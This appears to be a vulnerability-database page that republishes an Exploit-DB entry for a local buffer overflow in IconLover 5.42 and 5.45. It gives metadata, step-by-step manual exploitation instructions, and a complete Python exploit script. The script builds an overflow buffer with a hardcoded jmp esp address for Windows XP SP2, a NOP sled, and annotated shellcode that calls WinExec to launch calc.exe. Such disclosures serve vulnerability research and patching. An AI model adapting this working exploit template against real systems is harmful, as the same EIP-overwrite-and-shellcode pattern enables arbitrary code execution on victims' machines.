IconLover v5.42 Buffer Overflow Exploit

vendor:

IconLover

by:

cor3sm4sh3r

7,5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: IconLover

Affected Version From: 5.42

Affected Version To: 5.45

Patch Exists: YES

Related CWE: N/A

CPE: a:aha-soft:iconlover

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP Professional SP2

2015

IconLover v5.42 Buffer Overflow Exploit

A buffer overflow vulnerability exists in IconLover v5.42 and v5.45. An attacker can exploit this vulnerability by copying the content of exploit.txt to the clipboard, running the IconLover.exe software, clicking the File -> New Icon Lybrary option, clicking the Lybrary and pushing the Download button, pasting the input Website Adress (URL) AAAA+... string, clicking ok and hiding. Successful exploitation will open an instance of calc.exe.

Mitigation:

Upgrade to the latest version of IconLover.

Source

Exploit-DB raw data:

# Exploit Title: IconLover v5.42 Buffer Overflow Exploit
# Date: 29/09/2015
# Exploit Author: cor3sm4sh3r
# Author email: cor3sm4sh3r[at]gmail.com
# Contact: https://in.linkedin.com/in/cor3sm4sh3r
# Twitter: https://twitter.com/cor3sm4sh3r
# Category: Local
# Tested : win XP professional sp2 


'''
Credits & Authors:
==================
ZwX (http://zwx.fr/)
[http://www.vulnerability-lab.com/show.php?user=ZwX]

#References (Source):
http://www.vulnerability-lab.com/get_content.php?id=1609

Affected Product(s):
====================
AHA-Soft
Product: IconLover - Software (Windows) 5.42 and 5.45


Manual steps to exploit...
1. Copy the content of  exploit.txt to your clipboard
2. Run the IconLover.exe software
3. Click the File -> New Icon Lybrary option
4. Click the Lybrary and push the Download button
5. Paste it the input Website Adress (URL) AAAA+... string click ok and hide
6. Successful exploitation will open an instance of calc.exe!
 
'''


#!/usr/bin/env python
#badchars = "\x00\x0a\x0d"
junk  = "\x41" * 1039
eip  = "\xed\x1e\x94\x7c"    #jmp esp 7c941eed ntdll.dll ( XP sp2 )
nopsled ="\x90"*20

shellcode  = "\x33\xc0"             #=> XOR EAX,EAX          |  Zero out EAX register
shellcode += "\x50"                 #=> PUSH EAX             |  Push EAX to have null-byte padding for "calc.exe"
shellcode += "\x68\x2E\x65\x78\x65" #=> PUSH ".exe"          |  Push The ASCII string to the stack
shellcode += "\x68\x63\x61\x6C\x63" #=> PUSH "calc"          |
shellcode += "\x8B\xC4"             #=> MOV EAX,ESP          |  Put a pointer to the ASCII string in EAX
shellcode += "\x6A\x01"             #=> PUSH 1               |  Push uCmdShow parameter to the stack
shellcode += "\x50"                 #=> PUSH EAX             |  Push the pointer to lpCmdLine to the stack
shellcode += "\xBB\x4d\x11\x86\x7C" #=> MOV EBX,7C86114d     |  Move the pointer to WinExec() into EBX
shellcode += "\xFF\xD3"             #=> CALL EBX    
shellcode += "\x33\xc0"             #=> XOR EAX,EAX          |  Zero out EAX register
shellcode += "\x50"                 #=> PUSH EAX             |  Push EAX
shellcode += "\xBB\xa2\xca\x81\x7c" #=> MOV EBX,7C81caa2     |  Exit process
shellcode += "\xFF\xD3"             #=> CALL EBX

packet = junk + eip + nopsled + shellcode + nopsled

file=open('exploit.txt','w')
file.write(packet)
file.close()